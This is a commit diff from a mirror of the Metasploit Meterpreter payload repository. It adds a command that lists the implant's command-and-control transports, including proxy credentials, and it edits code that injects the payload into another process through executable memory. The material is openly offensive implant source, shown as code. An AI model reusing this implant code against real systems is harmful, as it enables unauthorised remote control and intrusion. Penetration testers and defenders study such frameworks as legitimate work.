github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-05-06 16:09:38 +02:00
Code Releases Activity

Add transport listing

Browse Source
This commit is contained in:
OJ 2015-05-04 11:18:48 +10:00
parent bfccf50c6b
commit 952bcd7f32
4 changed files with 109 additions and 25 deletions
c/meterpreter/source
common
arch/win/i386
base_dispatch.c
base.ccore.h
server
metsrv.c

86
c/meterpreter/source/common/arch/win/i386/base_dispatch.c

@ -119,7 +119,7 @@ DWORD create_transport_from_request(Remote* remote, Packet* packet, Transport**
{ {
BOOL ssl = wcsncmp(transportUrl, L"https", 5) == 0; BOOL ssl = wcsncmp(transportUrl, L"https", 5) == 0;
wchar_t* ua = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_UA); wchar_t* ua = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_UA);
wchar_t* proxy = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_INFO); wchar_t* proxy = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_HOST);
wchar_t* proxyUser = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_USER); wchar_t* proxyUser = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_USER);
wchar_t* proxyPass = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_PASS); wchar_t* proxyPass = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_PROXY_PASS);
PBYTE certHash = packet_get_tlv_value_raw(packet, TLV_TYPE_TRANS_CERT_HASH); PBYTE certHash = packet_get_tlv_value_raw(packet, TLV_TYPE_TRANS_CERT_HASH);
@ -172,6 +172,86 @@ DWORD create_transport_from_request(Remote* remote, Packet* packet, Transport**
return result; return result;
} }
DWORD remote_request_core_transport_list(Remote* remote, Packet* packet)
{
DWORD result = ERROR_SUCCESS;
Packet* response = NULL;
do
{
response = packet_create_response(packet);
if (!response)
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
// Add the session timeout to the top level
packet_add_tlv_uint(response, TLV_TYPE_TRANS_SESSION_EXP, remote->sess_expiry_end - current_unix_timestamp());
Transport* current = remote->transport;
Transport* first = remote->transport;
do
{
Packet* transportGroup = packet_create_group();
if (!transportGroup)
{
// bomb out, returning what we have so far.
break;
}
dprintf("[DISPATCH] Adding URL %S", current->url);
packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_URL, current->url);
dprintf("[DISPATCH] Adding Comms timeout %u", current->timeouts.comms);
packet_add_tlv_uint(transportGroup, TLV_TYPE_TRANS_COMM_TIMEOUT, current->timeouts.comms);
dprintf("[DISPATCH] Adding Retry total %u", current->timeouts.retry_total);
packet_add_tlv_uint(transportGroup, TLV_TYPE_TRANS_RETRY_TOTAL, current->timeouts.retry_total);
dprintf("[DISPATCH] Adding Retry wait %u", current->timeouts.retry_wait);
packet_add_tlv_uint(transportGroup, TLV_TYPE_TRANS_RETRY_WAIT, current->timeouts.retry_wait);
if (current->type != METERPRETER_TRANSPORT_SSL)
{
HttpTransportContext* ctx = (HttpTransportContext*)current->ctx;
dprintf("[DISPATCH] Transport is HTTP/S");
if (ctx->ua)
{
packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_UA, ctx->ua);
}
if (ctx->proxy)
{
packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_PROXY_HOST, ctx->proxy);
}
if (ctx->proxy_user)
{
packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_PROXY_USER, ctx->proxy_user);
}
if (ctx->proxy_pass)
{
packet_add_tlv_wstring(transportGroup, TLV_TYPE_TRANS_PROXY_PASS, ctx->proxy_pass);
}
if (ctx->cert_hash)
{
packet_add_tlv_raw(transportGroup, TLV_TYPE_TRANS_CERT_HASH, ctx->cert_hash, CERT_HASH_SIZE);
}
}
packet_add_group(response, TLV_TYPE_TRANS_GROUP, transportGroup);
current = current->next_transport;
} while (first != current);
} while (0);
if (response)
{
packet_transmit_response(result, remote, response);
}
return result;
}
BOOL remote_request_core_transport_next(Remote* remote, Packet* packet, DWORD* result) BOOL remote_request_core_transport_next(Remote* remote, Packet* packet, DWORD* result)
{ {
dprintf("[DISPATCH] Asking to go to next transport (from 0x%p to 0x%p)", remote->transport, remote->transport->next_transport); dprintf("[DISPATCH] Asking to go to next transport (from 0x%p to 0x%p)", remote->transport, remote->transport->next_transport);
@ -484,7 +564,7 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
break; break;
} }
// Allocate memory for the migrate stub, context and payload // Allocate memory for the migrate stub, context, payload and configuration block
lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT) + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); lpMemory = (LPBYTE)VirtualAllocEx(hProcess, NULL, dwMigrateStubLength + sizeof(MIGRATECONTEXT) + dwPayloadLength + configSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!lpMemory) if (!lpMemory)
{ {
@ -578,7 +658,7 @@ BOOL remote_request_core_migrate(Remote * remote, Packet * packet, DWORD* pResul
* @remark If no values are given, no updates are made. The response to * @remark If no values are given, no updates are made. The response to
this message is the new/current settings. this message is the new/current settings.
*/ */
DWORD remote_request_transport_set_timeouts(Remote * remote, Packet * packet) DWORD remote_request_core_transport_set_timeouts(Remote * remote, Packet * packet)
{ {
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
Packet* response = NULL; Packet* response = NULL;

6
c/meterpreter/source/common/base.c

@ -20,7 +20,7 @@ extern DWORD remote_request_core_crypto_negotiate(Remote *remote, Packet *packet
extern BOOL remote_request_core_shutdown(Remote *remote, Packet *packet, DWORD* pResult); extern BOOL remote_request_core_shutdown(Remote *remote, Packet *packet, DWORD* pResult);
extern DWORD remote_request_transport_set_timeouts(Remote * remote, Packet * packet); extern DWORD remote_request_core_transport_set_timeouts(Remote * remote, Packet * packet);
#ifdef _WIN32 #ifdef _WIN32
extern DWORD remote_request_core_transport_getcerthash(Remote* remote, Packet* packet); extern DWORD remote_request_core_transport_getcerthash(Remote* remote, Packet* packet);
@ -29,6 +29,7 @@ extern DWORD remote_request_core_transport_setcerthash(Remote* remote, Packet* p
// POSIX support coming soon // POSIX support coming soon
#endif #endif
extern DWORD remote_request_core_transport_list(Remote* remote, Packet* packet);
extern BOOL remote_request_core_transport_change(Remote *remote, Packet *packet, DWORD* pResult); extern BOOL remote_request_core_transport_change(Remote *remote, Packet *packet, DWORD* pResult);
extern BOOL remote_request_core_transport_next(Remote* remote, Packet* packet, DWORD* result); extern BOOL remote_request_core_transport_next(Remote* remote, Packet* packet, DWORD* result);
extern BOOL remote_request_core_transport_prev(Remote* remote, Packet* packet, DWORD* result); extern BOOL remote_request_core_transport_prev(Remote* remote, Packet* packet, DWORD* result);
@ -86,11 +87,12 @@ Command baseCommands[] =
// Crypto // Crypto
COMMAND_REQ("core_crypto_negotiate", remote_request_core_crypto_negotiate), COMMAND_REQ("core_crypto_negotiate", remote_request_core_crypto_negotiate),
// timeouts // timeouts
COMMAND_REQ("core_transport_set_timeouts", remote_request_transport_set_timeouts), COMMAND_REQ("core_transport_set_timeouts", remote_request_core_transport_set_timeouts),
#ifdef _WIN32 #ifdef _WIN32
COMMAND_REQ("core_transport_getcerthash", remote_request_core_transport_getcerthash), COMMAND_REQ("core_transport_getcerthash", remote_request_core_transport_getcerthash),
COMMAND_REQ("core_transport_setcerthash", remote_request_core_transport_setcerthash), COMMAND_REQ("core_transport_setcerthash", remote_request_core_transport_setcerthash),
#endif #endif
COMMAND_REQ("core_transport_list", remote_request_core_transport_list),
COMMAND_INLINE_REQ("core_transport_change", remote_request_core_transport_change), COMMAND_INLINE_REQ("core_transport_change", remote_request_core_transport_change),
COMMAND_INLINE_REQ("core_transport_next", remote_request_core_transport_next), COMMAND_INLINE_REQ("core_transport_next", remote_request_core_transport_next),
COMMAND_INLINE_REQ("core_transport_prev", remote_request_core_transport_prev), COMMAND_INLINE_REQ("core_transport_prev", remote_request_core_transport_prev),

7
c/meterpreter/source/common/core.h

@ -151,11 +151,12 @@ typedef enum
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_VALUE(TLV_META_TYPE_UINT, 433), ///! Represents the communications timeout. TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_VALUE(TLV_META_TYPE_UINT, 433), ///! Represents the communications timeout.
TLV_TYPE_TRANS_SESSION_EXP = TLV_VALUE(TLV_META_TYPE_UINT, 434), ///! Represents the session expiration. TLV_TYPE_TRANS_SESSION_EXP = TLV_VALUE(TLV_META_TYPE_UINT, 434), ///! Represents the session expiration.
TLV_TYPE_TRANS_CERT_HASH = TLV_VALUE(TLV_META_TYPE_RAW, 435), ///! Represents the certificate hash (for https). TLV_TYPE_TRANS_CERT_HASH = TLV_VALUE(TLV_META_TYPE_RAW, 435), ///! Represents the certificate hash (for https).
TLV_TYPE_TRANS_PROXY_INFO = TLV_VALUE(TLV_META_TYPE_STRING, 436), ///! Represents the proxy info string (for http). TLV_TYPE_TRANS_PROXY_HOST = TLV_VALUE(TLV_META_TYPE_STRING, 436), ///! Represents the proxy host string (for http/s).
TLV_TYPE_TRANS_PROXY_USER = TLV_VALUE(TLV_META_TYPE_STRING, 437), ///! Represents the proxy user name (for http). TLV_TYPE_TRANS_PROXY_USER = TLV_VALUE(TLV_META_TYPE_STRING, 437), ///! Represents the proxy user name (for http/s).
TLV_TYPE_TRANS_PROXY_PASS = TLV_VALUE(TLV_META_TYPE_STRING, 438), ///! Represents the proxy password (for http). TLV_TYPE_TRANS_PROXY_PASS = TLV_VALUE(TLV_META_TYPE_STRING, 438), ///! Represents the proxy password (for http/s).
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_VALUE(TLV_META_TYPE_UINT, 439), ///! Total time (seconds) to continue retrying comms. TLV_TYPE_TRANS_RETRY_TOTAL = TLV_VALUE(TLV_META_TYPE_UINT, 439), ///! Total time (seconds) to continue retrying comms.
TLV_TYPE_TRANS_RETRY_WAIT = TLV_VALUE(TLV_META_TYPE_UINT, 440), ///! Time (seconds) to wait between reconnect attempts. TLV_TYPE_TRANS_RETRY_WAIT = TLV_VALUE(TLV_META_TYPE_UINT, 440), ///! Time (seconds) to wait between reconnect attempts.
TLV_TYPE_TRANS_GROUP = TLV_VALUE(TLV_META_TYPE_GROUP, 441), ///! A single transport grouping.
// session/machine identification // session/machine identification
TLV_TYPE_MACHINE_ID = TLV_VALUE(TLV_META_TYPE_STRING, 460), ///! Represents a machine identifier. TLV_TYPE_MACHINE_ID = TLV_VALUE(TLV_META_TYPE_STRING, 460), ///! Represents a machine identifier.

19
c/meterpreter/source/server/metsrv.c

@ -10,27 +10,28 @@
#endif #endif
/*
* Entry point for the DLL (or not if compiled as an EXE)
*/
#ifdef _WIN32 #ifdef _WIN32
DWORD __declspec(dllexport) Init(LPVOID config) DWORD __declspec(dllexport) Init(SOCKET fd)
{ {
MetsrvConfig* metConfig = (MetsrvConfig*)config; // In the case of metsrv payloads, the parameter passed to init is NOT a socket, it's actually
// a pointer to the metserv configuration, so do a nasty cast and move on.
MetsrvConfig* metConfig = (MetsrvConfig*)fd;
DWORD result = server_setup(metConfig); DWORD result = server_setup(metConfig);
dprintf("[METSRV] Exiting with %08x", metConfig->session.exit_func); dprintf("[METSRV] Exiting with %08x", metConfig->session.exit_func);
switch(metConfig->session.exit_func) // We also handle exit func directly in metsrv now because the value is added to the
// configuration block and we manage to save bytes in the stager/header as well.
switch (metConfig->session.exit_func)
{ {
case EXITFUNC_SEH: case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL ); SetUnhandledExceptionFilter(NULL);
break; break;
case EXITFUNC_THREAD: case EXITFUNC_THREAD:
ExitThread( 0 ); ExitThread(0);
break; break;
case EXITFUNC_PROCESS: case EXITFUNC_PROCESS:
ExitProcess( 0 ); ExitProcess(0);
break; break;
default: default:
break; break;